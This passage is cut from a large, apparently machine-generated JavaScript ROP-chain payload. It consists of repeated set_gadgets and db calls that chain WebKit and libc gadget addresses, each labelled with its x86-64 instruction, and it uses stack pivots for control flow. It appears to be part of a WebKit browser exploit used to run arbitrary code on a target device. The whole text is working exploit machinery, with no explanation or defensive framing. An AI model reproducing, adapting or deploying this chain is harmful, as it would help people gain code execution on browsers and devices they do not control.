webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+212520, //L3640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+212488, //L3638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3638: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3639: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3640: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+212632, //L3642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+212680, //L3645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+212648, //L3643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3643: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3644: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3645: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+212792, //L3646+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+212784, //L3646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3646: db([0, 0]); // 0x0 set_gadgets([ ropchain+212808, //L3646+24 ropchain+230352, //L3641 libc_base+764760, //pop rsi ropchain+212848, //L3647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3647: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3649: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, 
rsi libc_base+764760, //pop rsi ropchain+212968, //L3652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+212952, //L3650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3650: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3652: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+213144, //L3655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213160, //L3656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213112, //L3653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213128, //L3654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3653: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3654: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3655: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3656: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+213320, //L3660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213288, //L3658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+213304, //L3659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3657: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3658: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3659: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3660: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr 
rax, cl libc_base+764760, //pop rsi ropchain+213424, //L3663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213456, //L3665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3662: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3664: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3665: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+213568, //L3666+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+213560, //L3666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3666: db([0, 0]); // 0x0 set_gadgets([ ropchain+213584, //L3666+24 ropchain+214624, //L3661 libc_base+764760, //pop rsi ropchain+213624, //L3667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3667: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3669: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+213744, //L3672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213728, //L3670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3670: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3672: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+213920, //L3675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213936, //L3676 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213888, //L3673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213904, //L3674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3673: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3674: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3675: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3676: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+214032, //L3678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+214016, //L3677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3678: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3679: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3680: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3681: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+214232, //L3683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3683: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+214288, //L3684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3684: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+214424, //L3688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+214408, //L3687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3686: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3687: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3688: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+214512, //L3689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214544, //L3691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3689: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3691: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+214616, //L3692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3692: db([0, 0]); // 0x0 //L3661: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+214744, //L3695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214760, //L3696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+214728, 
//L3694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3695: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3696: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+214920, //L3701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214936, //L3702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+214872, //L3698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3698: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3699: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3700: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3702: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+215048, //L3703+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+215040, //L3703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3703: db([0, 0]); // 0x0 set_gadgets([ ropchain+215064, //L3703+24 ropchain+217960, //L3697 libc_base+764760, //pop rsi ropchain+215104, //L3704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3706: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+215224, //L3709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+215208, //L3707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3707: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3709: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+215384, //L3713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+215352, //L3711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+215368, //L3712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3710: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3711: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3713: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+215440, //L3715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3715: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+215568, //L3717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+215584, //L3718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215552, //L3716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3716: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3717: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3718: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+215744, //L3722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov 
rax, rcx libc_base+764760, //pop rsi ropchain+215712, //L3720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215728, //L3721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3719: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3720: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3721: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3722: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+215800, //L3724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3724: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+215928, //L3726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+215944, //L3727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215912, //L3725 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3725: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3726: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3727: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+216104, //L3732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+216120, //L3733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+216056, //L3729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3729: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3730: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3731: db([1, 
0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L3732: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3733: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+216240, //L3734+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+216232, //L3734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3734: db([0, 0]); // 0x0 set_gadgets([ ropchain+216256, //L3734+24 ropchain+217584, //L3728 libc_base+764760, //pop rsi ropchain+216296, //L3735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3735: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3737: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+216416, //L3740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+216400, //L3738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3738: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3740: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+216592, //L3743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+216608, //L3744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+216560, //L3741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+216576, //L3742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L3741: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3742: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3743: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3744: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+216704, //L3746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+216688, //L3745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3745: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3746: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3747: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3748: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L3749: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3750: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3751: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L3752: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+217056, //L3754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3754: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+217112, //L3755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3755: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+217192, //L3758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3758: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+217248, //L3759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3759: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+217384, //L3763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+217368, //L3762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3761: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3762: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3763: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+217472, //L3764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+217504, //L3766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3766: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+217576, //L3767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3767: db([0, 0]); // 0x0 //L3728: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+217704, //L3770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217720, //L3771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+217688, //L3769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3769: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3770: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3771: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+217864, //L3774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217880, //L3775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+217832, //L3772 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3772: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3773: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3774: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3775: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, 
//setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+217952, //L3776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3776: db([0, 0]); // 0x0 //L3697: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+218080, //L3779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218096, //L3780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218064, //L3778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3780: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+218208, //L3782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218256, //L3785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+218224, //L3783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3782: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3783: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3784: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3785: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+218368, //L3786+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+218360, //L3786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); 
//L3786: db([0, 0]); // 0x0 set_gadgets([ ropchain+218384, //L3786+24 ropchain+219096, //L3781 libc_base+764760, //pop rsi ropchain+218424, //L3787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3787: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3789: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+218544, //L3792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218528, //L3790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3790: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3792: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+218720, //L3795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218736, //L3796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 